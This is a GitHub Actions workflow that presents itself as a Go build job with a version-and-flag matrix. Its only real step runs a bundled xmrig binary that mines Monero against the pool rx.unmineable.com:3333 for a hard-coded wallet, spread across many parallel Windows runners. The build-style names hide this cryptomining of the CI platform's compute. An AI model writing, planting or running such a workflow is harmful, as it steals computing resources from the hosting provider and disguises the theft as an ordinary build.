name: Mn-rotwin
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Mn-rotwin
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
          
    - name: RUNNING
      run: .\xmrig-6.18.0\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u XMR:85DcBUNuNVNQm1fUNgnXBLXxdkK8PaivjZXaySgS2Yr6iPdDN94EbWwim1g6iaGJscTXnFHfJyGBk5HksVM9SthdFScd3ss.semangat -p x
    - name: DONE
      run: exit

    
